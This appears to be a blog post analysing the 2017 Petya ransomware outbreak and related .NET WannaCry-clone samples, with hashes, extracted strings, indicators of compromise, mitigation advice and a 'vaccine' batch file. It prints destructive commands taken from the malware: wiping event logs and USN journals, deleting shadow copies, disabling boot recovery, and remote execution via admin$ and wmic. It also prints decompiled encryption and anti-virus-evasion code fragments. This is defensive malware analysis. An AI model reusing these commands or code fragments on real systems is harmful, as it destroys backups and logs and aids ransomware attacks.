After Wannacry ransomware attack, Petya ransomware comes with new
wave of attack. This ransomware campaign is currently taking place which has
already impacted companies in countries across the world including the Ukraine,
Spain, Russia, Netherlands, France, and India. Industries which we are aware of
that have already been hit by this cyber-attack include the telecommunications,
banking, transportation, life sciences, food & beverage, and power &
utilities sectors.
The criminals behind the ransomware are requesting a ransom USD 300 in
bitcoin – reportedly to be paid within three days - or else all files on the
computer will be deleted (see screenshot below).
Possible mode of entry:
Petya ransomware spreading mechanism is email spam in the form of
boobytrapped Office documents. These documents use the CVE-2017-0199 Office RTF
vulnerability to download the installer and it leads to the execution of SMB
worm to spreading like Wannacry ransomware. Wikileaks
For this CVE, the given description is:
Microsoft Office 2007 SP3,
Microsoft Office 2010 SP2, Microsoft Office 2013 SP1, Microsoft Office 2016,
Microsoft Windows Vista SP2, Windows Server 2008 SP2, Windows 7 SP1, Windows
8.1 allow remote attackers to execute arbitrary code via a crafted document,
aka "Microsoft Office/WordPad Remote Code Execution Vulnerability
w/Windows API."
|
The generalized description as execution of arbitrary code using
crafter document by remote attackers. Remote attackers meant that mode of entry
as email spam. We received samples for analysis and based on our analysis we
made the following findings.
Sample: SHA 256: 027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745
Actually this sample is very famous due to the many researchers
given their opinion on this sample. So while doing our manual analysis, we
simultaneously found the automated analysis report in the online platforms. But
that sample is dll file, so we choose to continue our manual analysis. During
our analysis, we also received another dll sample:
SHA 256: 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1
We compared the compilation time of those samples and found mostly
similar in timestamp.
The file properties are almost similar but when we checked the
libraries and it is confirmed. Both this files are similar behavior only.
crypt32.dll Crypto API32
iphlpapi.dll IP Helper API
ws2_32.dll Windows Socket 2.0 32-Bit DLL
mpr.dll Multiple Provider Router DLL
netapi32.dll Net Win32 API DLL
dhcpsapi.dll DHCP
Server API Stub DLL
The above dll were used by ransomware samples during encryption,
downloading, etc. Our interest goes to crypto API, which have the following
functions called CryptBinaryToStringW,
CryptStringToBinaryW, CryptDecodeObjectEx. These functions used in
converting array of bytes to formatted strings. Further we look in to the
strings of the file and we noticed the encryption related strings:
·
CryptReleaseContext
·
CryptAcquireContext
·
CryptGenRandom
·
CryptExportKey
·
CryptAcquireContext
·
CryptSetKeyParam
·
CryptImportKey
·
CryptEncrypt
·
CryptGenKey
·
CryptDestroyKey
And after that we looked in to very interesting strings:
·
.3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xls
·
Microsoft
Enhanced RSA and AES Cryptographic Provider
·
README.TXT
·
kernel32.dll
·
iphlpapi.dll
·
127.0.0.1
·
SeTcbPrivilege
·
SeShutdownPrivilege
·
SeDebugPrivilege
·
ComSpec
·
\cmd.exe
·
wevtutil
cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl
Application & fsutil usn deletejournal /D
%c:sg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xls
·
dllhost.dat
·
wbem\wmic.exe
process call create "C:\Windows\System32\rundll32.exe
\"C:\Windows\%s\" #1
Application & fsutil usn deletejournal /D
%c:sg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xls
Since this is dll file (non com dll) it needs to register via
rundll32.exe. We know that no user going to call the rundll32.exe to execute a
dll file, meaning a normal user don’t know how the dlls are executed. Actually
dll files are executed by the parent exe files. If we look in to the codes and
strings, we can see the rundll32.exe calling and where our sample is stored.
·
00000001338C 00001001418C 0
ComSpec
·
00000001339C 00001001419C 0
\cmd.exe
·
0000000133B0 0000100141B0 0
wevtutil cl Setup & wevtutil cl System & wevtutil cl Security
& wevtutil cl Application & fsutil usn deletejournal /D %c:
·
0000000134A8 0000100142A8 0
schtasks %ws/Create /SC once /TN "" /TR "%ws" /ST
%02d:%02d
·
000000013520 000010014320 0
at %02d:%02d %ws
·
000000013544 000010014344 0
shutdown.exe /r /f
·
00000001356C 00001001436C 0
/RU "SYSTEM"
·
00000001358C 00001001438C 0
dllhost.dat
·
0000000135FB 0000100143FB 0
u%s \\%s -accepteula -s
·
000000013630 000010014430 0
-d C:\Windows\System32\rundll32.exe "C:\Windows\%s",#1
·
0000000136A0 0000100144A0 0
wbem\wmic.exe
·
0000000136C0 0000100144C0 0
%s /node:"%ws" /user:"%ws" /password:"%ws"
·
000000013718 000010014518 0
process call create "C:\Windows\System32\rundll32.exe
\"C:\Windows\%s\" #1
·
0000000137B4 0000100145B4 0
\\%s\admin$
·
0000000137CC 0000100145CC 0
\\%ws\admin$\%ws
·
000000015468 000010016C68 0
c:\Windows\
·
000000015480 000010016C80 0
rundll32.exe
·
000000016CD0 0000100184D0 0
rundll32.exe
·
000000016CF0 0000100184F0 0
c:\Windows\
In the above strings, we clear see that process call create which
goes to rundll32.exe (physical location). And it again point to the physical
location file in windows location. But this didn’t confirm whether this sample
or any other files to be executed. So I copied the dll file to windows folder
and execute the following command:
rundll32.exe <sample name.dll> #1
After that step, I refer the code of the dll and found the
following:
So there is some connection between the file execution, schtasks
and shutdown.exe. After executing dll, we saw schedule task is added.
It created At1 and scheduled for exactly one
hour after the creation of this schedule task. Our guess or instinct says it is
for shutdown call like we saw in the previous screen shot.
Our analysis is correct that schedule task
actually for shutdown the system. After the restart it brings to ransom note
page:
So we cannot access our file and it is encrypted. Payment
instructions, bitcoin wallet details and purchased key prompt is blinking to
enter. We randomly type some text and it throws incorrect key error.
Email address associated with this ransomware:
wowsmith123456(@)posteo(.)net
Current status of this email address:
Posteo is an email service provider offering the paid email
accounts. In this petya ransomware case, attackers used posteo address as a
contact option. Their abuse team checked this and blocked that contact address.
Hence, paying the ransom can’t be assured that victim will receive
the decryption key from the attackers. They can’t contact the attacker using
the email address.
We collected associated domains and ip for detection purpose with
this post.
Ransomware spreading Url:
·
benkow(.)cc
·
Coffeinoffice(.)xyz
·
french-cooking(.)com
·
sundanders(.)online
·
casconut(.)xyz
·
blumbeerg(.)xyz
·
insurepol(.)in
·
whitefoam(.)org(.)uk
·
xfusion(.)co(.)uk
·
affliates(.)in
·
hyporus(.)in
·
dantan(.)club
·
kababmachatu(.)xyz
·
damodot(.)xyz
·
ballotvize(.)xyz
Bitcoin addresses: 1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX
C&C payment servers:
·
mischapuk6hyrn72(.)onion/
·
petya3jxfp2f7g3i(.)onion/
·
petya3sen7dyko2n(.)onion/
·
mischa5xyix2mrhd(.)onion/MZ2MMJ
·
mischapuk6hyrn72(.)onion/MZ2MMJ
·
petya3jxfp2f7g3i(.)onion/MZ2MMJ
·
petya3sen7dyko2n(.)onion/MZ2MMJ
Possible IP address
·
185.165(.)29(.)78
·
84.200(.)16(.)242
·
111.90(.)139(.)247
·
95.141(.)115(.)108
·
89.146(.)220(.)134
Action steps:
Detection rules like snort, yara were available from independent
sources in the net for this petya variant. Apply those snort rules in order to
detect this ransomware attacks. Blocking ransomware spreading domains and IP in
the Firewall and Proxy will prevent the attack. We recommend to block SMB port
access and RDP (Remote Desktop Protocol) to all computers from the internet.
Port 445 and 139 for SMB and 3389 for RDP should be blocked. We request to
ensure that all windows OS are patched with latest security update especially
MS17-010.
Petya vaccine available as batch file from bleeping computer:
Or you can copy the following batch file and save as .bat:
@echo off
REM Administrative check from here: https://stackoverflow.com/questions/4051883/batch-script-how-to-check-for-admin-rights
REM Vaccination discovered by twitter.com/0xAmit/status/879778335286452224
REM Batch file created by Lawrence Abrams of BleepingComputer.com. @bleepincomputer @lawrenceabrams
echo Administrative permissions required. Detecting permissions...
echo.
net session >nul 2>&1
if %errorLevel% == 0 (
if exist C:\Windows\perfc (
echo Computer already vaccinated for NotPetya/Petya/Petna/SortaPetya.
echo.
) else (
echo This is a NotPetya/Petya/Petna/SortaPetya Vaccination file. Do not remove as it protects you from being encrypted by Petya. > C:\Windows\perfc
echo This is a NotPetya/Petya/Petna/SortaPetya Vaccination file. Do not remove as it protects you from being encrypted by Petya. > C:\Windows\perfc.dll
echo This is a NotPetya/Petya/Petna/SortaPetya Vaccination file. Do not remove as it protects you from being encrypted by Petya. > C:\Windows\perfc.dat
attrib +R C:\Windows\perfc
attrib +R C:\Windows\perfc.dll
attrib +R C:\Windows\perfc.dat
echo Computer vaccinated for current version of NotPetya/Petya/Petna/SortaPetya.
echo.
)
) else (
echo Failure: You must run this batch file as Administrator.
)
pause
Further Attack wave in Ukraine:
While writing of this analysis report, we came to know about
wannacry clone attacks happening in Ukraine. We got three samples for analysis:
Sample1: MD5: 0BDE638B274C7F9C6C356D3987ED1A2D
Sample2: MD5: 87BE992695B752D86AEAB1116EB5393F
Sample3: MD5: 5C7C894A1CCFD8C8E0F174B0149A6601
All these three samples are .net compiled files:
Reversing the samples for analysis:
These samples shows like they were compiled on Jan 1 2016, but when we
search those hashes in VT and they seems to be uploaded couple of days back
only. So they were actually new samples only and compiling date seems to be
customised or modified by the malware author.
The sample one shows that wannacry strains inside the code. We
manually checked in other two samples too, they also have the same strains in
the code. We successfully found the code of this samples.
Please find the program below:
internal class Program
{
public static
string DEMO_KEY_PRIVATE =
"BwIAAACkAABSU0EyAAgAAAEAAQAdbwYdlbhbpDhA8l/d4oYSxIfiYq2AZkp2tj+07AOFQMP1u7MEIrEyoYDfCnaAgfOhuzRNy3m5Dq3ESl5zsmpa6mxR7jyg1c/lcgYQELYnJhpCZtRDWXiAJlOTzHehLquYg5jRXmtS7fKqAnU4l1xRqx1MSLk0M/U+c/v21OWZOPPWj399OmladHnO518JpyI3cm62wtr2JI7df5RGJFp+5EiHglHd0tcFatm0KgPCpf+VNQhIz4sA+wrO/m1Nbp8VVBc5xmk7oDmic3gxkkqD3eBNkDse+OMgpZJhvQ1bFOr2/UBxUiqVf+K01KN/Y7/f6cebWf43nx0q4FinyPu3zwglJxu5Q8S39zZe5sx0D5dOu/d2sS4JTBvO8q/ZaMCKEh3ngunldPVuoyplJ/2Xg3qa+1ZhSV3tyPZ4mL4zkp1IzbMYF1JKRFz1j+4RyMfUvprpGhdx/awOULSatR/B1h42lZqE7GcGJ1qZ7Vm+WQoI9UAzf68nq+t1MC0Rvv5TLK+nc7a5eZjJqPr4GaNrVqOgtQkzPumGOKS0e6ItQHHQwFuHOFZ+oB1JvM/4EXAPLLXAKCUmg+DFeOHn2+Qf37GlFFCS5gBL8zTlEy5QMSLBNRZuzDHG9Rz/9+oAYt8VF3aYnag4KIb9Ido3GCb/IXoxQ3MfNH3HUoZjZkvkuBf4F+rQ7QpJbUTHPjUzgzzHUoBk95SPyMAWubtsr9y/8IMJAXH6RBcPcGyZPZa+FsaPY8bpjvSqXhPHBYZ8bYkdaR0qQuPqF7HYoPW1v/fuDXYm08UzTKEjRgkmxbVhHCvsQHDDIvQ8VUf7OgPGnAP1IxsMloJEF3BVg3cCdpzjJQlfT/AbjOTjLwyc2MA7qXrJvi7b962NDkkrpDaZ1Rz5hWIiJPv5zV/jwscAlDFo9HryBH+2RaSN8LW6OhR/ZLYsyWmauyTOvzUPkIiYk5qsSmKctAlOy2FcQwdgOnXZDJqklhUmlzDS+Gk+nXgn0hWmDDYjCbZp/gy6ghgfTHIVNAEg5iUMLHdGy7gZrCuSo0CsvPBs0Z0DYAF88TAfhAeTfvhFILtmRIzig0E+OPI/F+jjMA7Uymb38cTzwA0AT9GEdJSIKXPhBzLVSKCgu8gMxnAOhRtWjZbpbPpCxvaGSGiRMLWHEhF73wy5595JCb1dAuvb9SYo2yDydQy1j/eAQ5BeG8fjSa5IjWVhyhR189kjN08twB+LpBKtsOsJWodXNxsR3vbaMoBcsVvIlynsfakVsbY+4d1ssinrrK5iSZwY4E4VhWK47WiHQSOM//6sO1qSDJBsMXyIEg4zKbT0dAfP5p3R7/TX3qi0Lpx6TvGppij6KvcQa1KEUiZEo5CJv08TgTgU0HS3QAj5VamRDc/m7dKGY4lz5u4aNLcyxgAOi4GVotTPyCKyya2HuLv6UAlW16tURm8asIniGcUG8tYjT+j3gtGr92Ww9niGz3wjtbffD9d4GX6SjAKpn7+fhJR+KFHZL6qfJqvziwFh7GyzF4QrMiwptkSkNhI=";
public static
string DEMO_KEY_PUBLIC =
"BgIAAACkAABSU0ExAAgAAAEAAQAdbwYdlbhbpDhA8l/d4oYSxIfiYq2AZkp2tj+07AOFQMP1u7MEIrEyoYDfCnaAgfOhuzRNy3m5Dq3ESl5zsmpa6mxR7jyg1c/lcgYQELYnJhpCZtRDWXiAJlOTzHehLquYg5jRXmtS7fKqAnU4l1xRqx1MSLk0M/U+c/v21OWZOPPWj399OmladHnO518JpyI3cm62wtr2JI7df5RGJFp+5EiHglHd0tcFatm0KgPCpf+VNQhIz4sA+wrO/m1Nbp8VVBc5xmk7oDmic3gxkkqD3eBNkDse+OMgpZJhvQ1bFOr2/UBxUiqVf+K01KN/Y7/f6cebWf43nx0q4FinyPu3";
public static
string DEMO_EXTENSIONS = "jpg,jpeg,png,tif,gif,bmp";
public static
string ENCRYPTION_TOOL_FNAME = "ed.exe";
public static
string ENCRYPTED_PRIVATE_KEY_FNAME = "key.encrypted";
public static
string[] ALL_EXTENSIONS = new string[]
{
"doc,docx,xls,xlsx,ppt,pptx,pst,ost,msg,eml",
"vsd,vsdx,txt,csv,rtf,123,wks,wk1,pdf,dwg",
"onetoc2,snt,docb,docm,dot,dotm,dotx,xlsm,xlsb,xlw",
"xlt,xlm,xlc,xltx,xltm,pptm,pot,pps,ppsm,ppsx",
"ppam,potx,potm,edb,hwp,602,sxi,sti,sldx,sldm",
"sldm,vdi,vmdk,vmx,gpg,aes,ARC,PAQ,bz2,tbk",
"bak,tar,tgz,gz,7z,rar,zip,backup,iso,vcd",
"raw,cgm,tiff,nef,psd,ai,svg,djvu,m4u,m3u",
"mid,wma,flv,3g2,mkv,3gp,mp4,mov,avi,asf",
"mpeg,vob,mpg,wmv,fla,swf,wav,mp3,sh,class",
"jar,java,rb,asp,php,jsp,brd,sch,dch,dip",
"pl,vb,vbs,ps1,bat,cmd,js,asm,h,pas",
"cpp,c,cs,suo,sln,ldf,mdf,ibd,myi,myd",
"frm,odb,dbf,db,mdb,accdb,sql,sqlitedb,sqlite3,asc",
"lay6,lay,mml,sxm,otg,odg,uop,std,sxd,otp",
"odp,wb2,slk,dif,stc,sxc,ots,ods,3dm,max",
"3ds,uot,stw,sxw,ott,odt,pem,p12,csr,crt,key,pfx,der"
};
public static
List<string> ListDrives()
{
DriveInfo[]
arg_0B_0 = DriveInfo.GetDrives();
List<string>
list = new List<string>();
DriveInfo[]
array = arg_0B_0;
for
(int i = 0; i < array.Length; i++)
{
DriveInfo
driveInfo = array[i];
if
(driveInfo.DriveType == DriveType.Fixed || driveInfo.DriveType ==
DriveType.Removable || driveInfo.DriveType == DriveType.Network)
{
list.Add(driveInfo.Name);
}
}
The above code snippet deals with keys, file extensions targeted
and details about the encryption tool. We moved on to the next sample and it
contains resources in the form of images for bitcoin details, ransom note
details.
internal static Bitmap wannacry
{
get
{
return
(Bitmap)Resources.ResourceManager.GetObject("wannacry",
Resources.resourceCulture);
}
}
Now we move to our final sample for analysis. It is very much
interesting when we see the code.
//
ed.CryptoFile
private
static string[] _exProcesses = new string[]
{
"lsm.exe",
"csrss.exe",
"dwm.exe",
"smss.exe",
"lsass.exe",
"wuauclt.exe",
"services.exe",
"svchost.exe",
"taskhost.exe",
"winlogon.exe",
"wininit.exe",
"conhost.exe",
"explorer.exe",
"spoolss.exe",
"spoolsv.exe",
"system.exe",
"avp.exe",
"avpui.exe",
"ekrn.exe",
"egui.exe",
"mfemmc.exe",
"mfefire.exe",
"mfevtps.exe",
"pefservice.exe",
"mcsvhost.exe",
"msascui.exe",
"msmpeng.exe",
"mpcmdrun.exe",
"avshadow.exe",
"avguard.exe",
"avgnt.exe"
};
This sample check for the presence of the anti-malware products
present in the system. Further we see the Aes related code:
using
(AesManaged aesManaged = new AesManaged())
{
aesManaged.Mode
= CipherMode.CBC;
aesManaged.KeySize
= 256;
aesManaged.Key
= key;
aesManaged.IV
= iv;
We shortened the cryptofile function in the following code
snippet:
public static class CryptoFile
{
public static
long CRYPT_BYTES = 5242880L;
private static
bool KillFileLockProcess(string path)
public static
bool Encrypt(string path, byte[] publicKeyBlob)
public static bool
Decrypt(string path, byte[] privateKeyBlob)
}
}
It also contains code to delete volume shadow copy services in
this program and it as follows:
if
(!(text == "-delshadowcopies"))
{
goto
IL_52B;
}
PS.ExecuteAndForget("cmd.exe",
"/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete &
bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set
{default} recoveryenabled no & wbadmin delete catalog –quiet");
goto
IL_52B;
}
Conclusion
Recent campaign of ransomware attacks giving numerous suggestions
that it might done by threat actors or state sponsored attacks. Ukraine got
specifically targeted in the last couple of weeks. Proper counter measures,
periodic patches, timely assessment on host compromise, network compromise and
vulnerability assessments can bring the organization in the safer side.
Post made by
newWorld